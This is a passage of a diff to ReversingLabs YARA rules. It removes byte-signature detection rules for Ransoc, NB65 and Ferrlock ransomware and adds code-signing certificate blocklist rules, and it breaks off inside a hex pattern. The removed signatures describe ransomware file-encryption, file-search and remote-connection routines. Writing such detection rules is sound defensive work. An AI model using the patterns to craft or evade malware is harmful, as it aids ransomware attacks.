-		tc_detection_name = "Ransoc"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$scan_for_services = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66 89
-            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3
-            E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73
-            ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66
-            89 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03
-            F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 66 39 2D ?? ??
-            ?? ?? 73 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 66 01 1D ?? ?? ?? ?? 8B
-            FB 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ??
-            ?? ?? 73 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 66
-            01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            EB ?? 85 FF 74 ?? 8D 44 24 ?? 50 E8
-      }
-		$remote_connection = {
-            8B 44 24 ?? 83 EC ?? 53 8B 5C 24 ?? 56 8B 74 24 ?? 50 56 E8 ?? ?? ?? ?? 8B D8 83 C4
-            ?? 83 FB ?? 75 ?? 5E B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 4C 24 ?? 55 8B 6C 24 ?? 57 55
-            56 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 56 FF 15 ?? ?? ?? ?? 50 56 53 E8
-            ?? ?? ?? ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8D
-            47 ?? 5F 5D 5E 5B 83 C4 ?? C3 8B 44 24 ?? 85 C0 74 ?? 85 ED 74 ?? 55 50 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B 83 C4
-            ?? C3 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8D 49 ?? 8B 74 24 ??
-            8B C6 2B 44 24 ?? 75 ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 2B
-            74 24 ?? 6A ?? 56 8D 54 24 ?? 56 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 53 FF D5 8B F8 85 FF
-            78 ?? 2B C6 01 44 24 ?? EB ?? 29 74 24 ?? 83 FF ?? 74 ?? 85 FF 75 ?? 53 FF 15 ?? ??
-            ?? ?? 85 FF 79 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B
-            83 C4 ?? C3 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 68 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D
-            8D 46 ?? 5E 5B 83 C4 ?? C3 8B 54 24 ?? 83 C2 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 4C 24 ??
-            8B 54 24 ?? 8B F8 8B 44 24 ?? 2B F0 83 C6 ?? 2B CE 51 03 F0 56 52 E8 ?? ?? ?? ?? 8D
-            44 24 ?? 50 E8
-      }
-		$encrypt_files = {
-            81 EC ?? ?? ?? ?? 53 55 56 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ??
-            8B F8 FF D6 8B 8C 24 ?? ?? ?? ?? 8B E8 8B 84 24 ?? ?? ?? ?? 50 51 57 8D 94 24 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 89 4C 24 ?? BB ??
-            ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? EB ?? 8D 49 ?? 55 68 ?? ?? ?? ?? 83 FB ?? 7E ?? 8D
-            94 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ?? ?? 52 F3 A5 E8 ?? ??
-            ?? ?? 8B BC 24 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? EB ?? 8D 84 24 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? 83 C4 ?? 6A ?? 8D 4C 24 ?? 6A ?? 51
-            E8 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 44 24 ?? B9 ?? ?? ?? ?? 80 30 ?? 40 49 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 6A ??
-            8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 51 8D
-            94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 8B FF 80 30 ?? 40 49 75 ?? 8D 54 24 ?? 52
-            E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 8D
-            54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 54 24
-            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 83 FF ?? 72 ?? BE ?? ?? ?? ?? 8B 4C 24 ?? 56 8D
-            44 24 ?? 50 51 E8 ?? ?? ?? ?? 01 74 24 ?? 2B FE 83 C4 ?? 43 89 BC 24 ?? ?? ?? ?? 85
-            FF 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-      }
-		$find_files = {
-            83 EC ?? 53 55 56 57 33 DB 68 ?? ?? ?? ?? 6A ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ??
-            ?? 8B E8 8D 44 24 ?? 50 89 6C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 55 51 E8 ?? ?? ?? ??
-            8B 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 55 68 ?? ?? ??
-            ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B F8 57 8D 54 24 ?? 52 8D 44 24 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 3B C3 75 ?? 8B 4C 24 ?? 51 8D 54 24 ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 8B 44 24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 4C 24 ??
-            51 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 33 FF 39 5C 24 ?? 76 ?? 8D 64 24 ?? 8B 44 24 ?? 8B 0C B8 51 56 E8 ?? ??
-            ?? ?? 47 83 C4 ?? 3B 7C 24 ?? 72 ?? 39 5C 24 ?? 75 ?? 8B 44 24 ?? 3B C3 74 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ??
-            ?? 8B 44 24 ?? 83 C4 ?? 89 5C 24 ?? 3B C3 0F 86 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ??
-            8B 44 24 ?? 8B 4C 24 ?? 8B 1C 88 53 55 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 57 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8B E8 E8 ?? ?? ?? ?? 6A ?? 56 89 44 24 ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 53 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            56 E8 ?? ?? ?? ?? 33 C0 8D 54 24 ?? 55 52 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 44 24 ?? 50 56
-            E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ??
-            ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B D3 52 E8 ?? ??
-            ?? ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 41 83 C4 ?? 89 4C 24 ?? 3B C8 0F 82 ?? ??
-            ?? ?? 33 DB 33 F6 3B C3 76 ?? 8B 44 24 ?? 8B 0C B0 51 E8 ?? ?? ?? ?? 46 83 C4 ?? 3B
-            74 24 ?? 72 ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ??
-            3B C3 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 5F 5E 5D 3B C3 5B 74 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 83 C4 ?? C3
-      }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $scan_for_services and $find_files and $encrypt_files and $remote_connection
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" and 1386806400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_NB65 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects NB65 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1aba009e-8065-5fb0-98e7-a595cb324076"
-		date = "2022-06-01"
-		modified = "2022-06-01"
+		id = "28a56bcf-1f13-5478-a6d5-7595464da198"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.NB65.yara#L1-L68"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f8a0e265fc72a9f017b37ce4b6dbb878285a5d298ab1b8c69f9fde7159426981"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16302-L16318"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7c1bec5059d40fc326bb08775888ed169abc746228eeb42c897f479992c5acab"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "NB65"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            E8 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? 75 ?? 33 C9 90 8A 44 0D ??
-            0F B6 C0 83 E8 ?? 6B C0 ?? 99 F7 FB 8D 42 ?? 99 F7 FB 88 54 0D ?? 41 83 F9 ?? 72 ??
-            8D 45 ?? 89 45 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 50
-            ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D0
-            85 C0 75 ?? 33 F6 66 90 A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ??
-            8D 50 ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? FF B4 B5 ?? ?? ??
-            ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$find_files = {
-            57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ??
-            5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ??
-            80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ??
-            ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ??
-            8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$enum_procs = {
-            33 C9 66 90 8A 84 0D ?? ?? ?? ?? 0F B6 C0 83 E8 ?? 8D 04 C0 99 F7 BD ?? ?? ?? ?? 8D
-            42 ?? 99 F7 BD ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? A1 ?? ?? ?? ?? 8B
-            40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41
-            ?? 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? 6A ?? E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? 8D 50 ?? 8B 8D ?? ?? ?? ?? 89 08 C7 02 ?? ??
-            ?? ?? 8B 4E ?? 89 48 ?? 8B 4E ?? 89 01 89 56 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0
-            0F 85 ?? ?? ?? ?? 5B A1 ?? ?? ?? ?? 8B 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9
-            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 ?? 57 FF D0 8B 4D ?? 5F 33 CD 5E E8 ?? ?? ??
-            ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $enum_procs ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nanjing Ranyi Technology Co., Ltd. " and pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" and 1352246400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ferrlock : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ferrlock ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "745ce529-46d0-56ed-a8fa-b41b26b068f4"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "78bfa550-d85e-5776-a65d-ff0039abd2c4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Ferrlock.yara#L1-L131"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b94bc77489dbb74573813631009e605bc848e17995a0a512d08b194ee3020b75"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16320-L16336"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ca00f1adacd6ff16e54b85be38c3a4545a10c76548e0647f7f3f6cfa4dff412d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ferrlock"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
-            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
-            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
-            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
-            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
-            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
-            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
-        }
-		$search_files_p2 = {
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
-            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
-            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
-            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
-            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$enum_rsrc = {
-            6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 8D 4D ?? 83 4D ?? ?? 51 50 6A
-            ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? EB ?? 33 DB 39 5D ?? 7E ??
-            8D 7E ?? F7 47 ?? ?? ?? ?? ?? 74 ?? 8D 47 ?? 89 45 ?? 8B 45 ?? 8B 00 8B 48 ?? 85 C9
-            74 ?? 8B 01 8D 55 ?? 52 FF 50 ?? EB ?? FF 37 8D 4D ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D
-            45 ?? 50 8B 45 ?? 8B 48 ?? E8 ?? ?? ?? ?? 83 4D ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 43 83
-            C7 ?? 3B 5D ?? 7C ?? 83 4D ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C2 ?? ?? E8 ?? ?? ?? ?? CC 55 8B EC 6A ?? 68 ?? ?? ?? ??
-            64 A1 ?? ?? ?? ?? 50 56 A1 ?? ?? ?? ?? 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83
-            65 ?? ?? 8B 4E ?? 85 C9 74 ?? 8B 11 3B CE 0F 95 C0 0F B6 C0 50 FF 52 ?? 83 66 ?? ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C3
-        }
-		$create_test_file_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 33 DB 8D 55
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 59 8D 45 ?? C6 45 ?? ??
-            50 8D 4D ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 CB ?? 8B 3D ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 65 ?? ??
-            8D 4D ?? 83 65 ?? ?? 56 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? FF 75 ?? 8B 45 ?? 2B 45
-            ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 55 ?? 8D 4D ?? 0F 43 45 ??
-            83 7D ?? ?? 0F 43 4D ?? 3B 55 ?? 75 ?? 52 50 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ??
-            ?? ?? ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ??
-            ?? 8D 4D ?? 0F 85 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 0F 85 ?? ??
-            ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 43 45 ?? 33 C9 51 57
-        }
-		$create_test_file_p2 = {
-            6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 3B C3 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
-            7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
-            33 C9 51 57 6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 8B F8 3B FB 0F 84 ?? ?? ?? ?? 6A ??
-            57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 6A ?? 58 3B F0 0F 42 F0 03 F0 56 E8 ?? ?? ?? ?? 59 6A ?? 89 85
-            ?? ?? ?? ?? 8D 45 ?? 50 56 8B B5 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75
-            ?? 57 FF 15 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 55 ?? 50
